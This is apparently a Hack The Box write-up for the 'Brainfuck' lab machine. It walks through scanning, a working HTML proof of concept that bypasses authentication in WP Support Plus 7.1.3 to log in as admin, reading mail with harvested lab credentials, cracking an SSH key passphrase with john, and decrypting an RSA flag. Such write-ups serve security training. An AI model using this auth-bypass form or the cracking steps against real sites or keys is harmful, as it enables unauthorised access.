Posts Hack The Box - Brainfuck Writeup
Post
Cancel

Hack The Box - Brainfuck Writeup

ae214194accd8b5ee7095a6727798c38.png

IPOSDifficultyRelease Date
10.10.10.17LinuxInsane29 April 2017

Enumeration

As with any HackTheBox host the first step is to run an nmap scan.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
kali@kali:~/Desktop/BrainFuck$ nmap -sC -sV -T4 -v 10.10.10.17
Starting Nmap 7.80 ( https://nmap.org ) at 
Scanning 10.10.10.17 [2 ports]
Completed Ping Scan at 11:12, 0.02s elapsed (1 total hosts)

Scanning 10.10.10.17 [1000 ports]
Discovered open port 22/tcp on 10.10.10.17
Discovered open port 110/tcp on 10.10.10.17
Discovered open port 443/tcp on 10.10.10.17
Discovered open port 143/tcp on 10.10.10.17
Discovered open port 25/tcp on 10.10.10.17

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: CAPA UIDL RESP-CODES USER SASL(PLAIN) TOP PIPELINING AUTH-RESP-CODE
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: SASL-IR OK ENABLE ID Pre-login have LITERAL+ post-login listed capabilities more IMAP4rev1 IDLE AUTH=PLAINA0001 LOGIN-REFERRALS
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-13T11:19:29
| Not valid after:  2027-04-11T11:19:29
| MD5:   cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
|_SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 48.42 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/Brainfuck. Any commands in this writeup will be executed from this directory.

hosts file

The nmap scan shows two domain names found in SSL certificates. These should be added to the /etc/hosts file to enable access. Add the below lines to this file.

1
2
10.10.10.17		brainfuck.htb
10.10.10.17		sup3rs3cr3t.brainfuck.htb

brainfuck.htb

Accessing https://brainfuck.htb in a web browser reveals a wordpress install. Judging from the content, this looks like a fresh install. There are posts visible by the username admin. To enumerate the install to find plugins and vulnerabilities wpscan was used.

wpscan

To run wpscan we need to use the command wpscan --url https://brainfuck.htb --disable-tls-checks. The --disable-tls-checks switch is needed as the requests will return an invalid certificate because the domain name is not a real domain and https:// must be used in the domain as there is no port 80 to forward requests to 443.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
wpscan --url https://brainfuck.htb --disable-tls-checks

---SNIP---

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

WP Scan reveals a plugin which is out of date.

searchsploit

Searchsploit is used to look for exploits for the vulnerable plugin.

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali:~/Desktop/BrainFuck$ searchsploit wordpress support
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting                 | php/webapps/36338.txt
WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting                                   | php/webapps/45619.txt
WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting            | php/webapps/35218.txt
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting                | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities      | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation        | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection               | php/webapps/40939.txt
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There are two exploits for version 7.1.3 of the WP Support Plus Responsive Ticket System plugin. The privilege Escalation exploit may be of interest. The exploit can be copied to the working directory with searchsploit -m 41006

Exploiting Wordpress

WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation

The exploit .txt file reveals that you can login as any user because of incorrect usage of the wp_set_auth_cookie function and provides a POC for this exploit in the form of an HTML file.

exploit.html

Create a new file named exploit.html and paste the modified POC code below. To make this exploit work the form action and input username value should be changed accordingly.

1
2
3
4
5
6
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

Run the exploit

To run the exploit, the exploit.html file has to be opened in a web browser. Once opened, submit the form and accept any certicate errors that show. This should result in a blank page, however, loading the wordpress website again will reveal that the admin user is now logged in.

Getting Credentials

Looking through the wordpress install. There is an Easy WP SMTP plugin. Navigating to the settings of this plugin reveals the username and password for an SMTP user when the page source is viewed as the password form is populated with a plaintext value. orestis:kHGuERB29DNiNE

471b87defb8de950eb17e11a25f3c312.png

Checking E-mails

With SMTP credentials it is now possible to read e-mails stored on the server for the user by connecting to the POP3 Server

This is possible using telnet with the command telnet brainfuck.htb 110. Once connected, logging in with the credentials is possible with the commands USER orestis and PASS kHGuERB29DNiNE. To list the e-mails the command LIST is used. To read e-mails the command RETR <Mail Number> is used.

103f2fb925d9e64d74d0625846ccc157.png

E-mail number 2 reveals user credentials.

1
2
3
4
Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Login to Sup3rS3cr3t.brainfuck.htb

Using the credentials found in the e-mail to login to the forum reveals an exchange between the admin and a hacker named orestis. The hacker is asking the admin to share their SSH key. The hacker signs off all messages with the same signature Orestis - Hacking for fun and profit. The admin and hacker take their discussion to an encrypted thread.

Finding the encryption

On the encrypted thread the hacker still uses the same signature to sign off each message. The length of each word in the encrypted message is the same as the original signature, so the encryption only shifts the character. Given that the encrypted signature is different in each reply, this encryption is something more elaborate than a character shifting algorithm like ROT13. After some research on cipher’s that use keys it is found to use a Keyed Vigenere. Using this link it is possible to work out the key used in the encryption.

ce0bae02c713350758570cfeb75bccb1.png

The key is a repeating phrase. Using this website it is possible to decrypt the message. Before decryption works, the start point of the key has to be found. After trying the different order of the words found as the key it is found that the correct order is fuckmybrain. Using this as the key it is possible to decrypt the URL for the ssh key.

fe00918e27e8fc2f6b8d1163640ad714.png

SSH Login

The key can be obtained by navigating to the link and download it. Saving the file to the working directory.

Cracking the passphrase

The id_rsa file has a passphrase that must be brute forced.

Obtaining crackable hash

To turn the key into a format that can be used by cracking software it must be converted using ssh2john.py. This can be run with the command below

1
/usr/share/john/ssh2john.py id_rsa > hash

Cracking the hash

Using john and the rockyou wordlist will crack the hash file created by ssh2john. This can be done using the command below.

1
sudo john hash -wordlist=/usr/share/wordlists/rockyou.txt

After a few moments the password is cracked.

77a8f55ddd7b9da102d0d4fa23e6f4f9.png

Login to SSH

To login the SSH server using the key the permissions of the key must be set first. This can be done with chmod 600 id_rsa. It is then possible to connect with the command ssh orestis@brainfuck.htb -i id_rsa and using the passphrase found by john when prompted. The session will connect and the user flag is in the users directory.

Privilege Escalation

Once a user session is running there are several files in the users folder. encrypt.sage is a script that prints the root flag in an encrypted format. the encrypted flag is stored in an output.txt. There is also a debug.txt which looks like values used in the encryption.

After some googling on the values in the script it looks like this python script can be used to decrypt the value in the output.txt

Modifying the script

To make the script work a few changes must be made. the p, q and e values need to be replaced with the values in the debug.txt file. the ct variable must be set to the contents of output.txt. The script is also modified to convert the hex output into plain text.

Modifed script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

def main():

    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079

    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182


    # compute n
    n = p * q

    # Compute phi(n)
    phi = (p - 1) * (q - 1)

    # Compute modular inverse of e
    gcd, a, b = egcd(e, phi)
    d = a

    print( "n:  " + str(d) );

    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print( "pt: " + str(pt) )
	
	print("The flag is:")
	print(format(pt, 'x').decode('hex'))

if __name__ == "__main__":
    main()
    

The root flag has been decrypted and the box is now complete.

This post is licensed under CC BY 4.0 by the author.